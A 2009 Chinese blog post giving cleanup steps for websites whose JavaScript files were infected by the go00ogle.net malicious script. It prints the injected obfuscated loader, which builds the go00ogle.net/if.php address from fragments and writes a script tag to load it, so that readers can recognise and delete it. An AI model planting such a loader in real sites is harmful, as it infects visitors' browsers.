遭遇go00ogle.net

2009-08-6  |  08:40分类:大千世界  |  标签:  |  

如果你的网站也被挂上了go00ogle.net的恶意代码,那么继续往下看,我们一起来消灭它。

如果博客(或网站)不幸被挂上了这个恶意代码,google会把该博客列为危险网站,chrome、firefox也会阻止用户访问,如下图。(不过“幸运”的是IE还可以访问)
ff报告

根据我自己见到的还有网友的经验,代码是通过修改你网站上的javascript脚本文件挂上去的。所以消灭它,你需要知道:

  1. 什么是javascript文件(.js),并能够用文本编辑器(如写字板)编辑它
  2. 如何更新服务器上的javascript文件(.js)

解决的办法:

  1. 你需要找到你网站上引用的全部js脚本文件,一般是下面的样子:
    <script type="text/javascript" src="/w/skins/common/wikibits.js"></script>
  2. 下载下来,并全部用写字板打开查看是否包含如下代码(一般会在文件的起始部分):
    function advQuery(){
    var Host="http://google.com/";Track="/if.php";get=unescape("%6E%65%74");
    document.write(unescape("%3Cscript src='"+Host.substr(0,9)+unescape("\u0030\u0030")+Host.substr(9,5)+get));
    document.write(unescape(Track+"' type='text/javascript'%3E%3C/script%3E"));
    };advQuery();
  3. 如果有,则删除这段代码,并更新服务器上的这个js文件。这段代码隐藏的js文件并不是一定的,例如可能是coolcode.js,也可能是podpress.js等等。
  4. 这样问题就解决了。最后你可能还需要,利用google网站管理员工具,告诉google你的网站已经修复了。参考:google网站管理员工具帮助

参考文献:
How to remove a go00ogle.net infection from your WordPress blog

(全文完)

喜欢本文,那就收藏到:

发表您的评论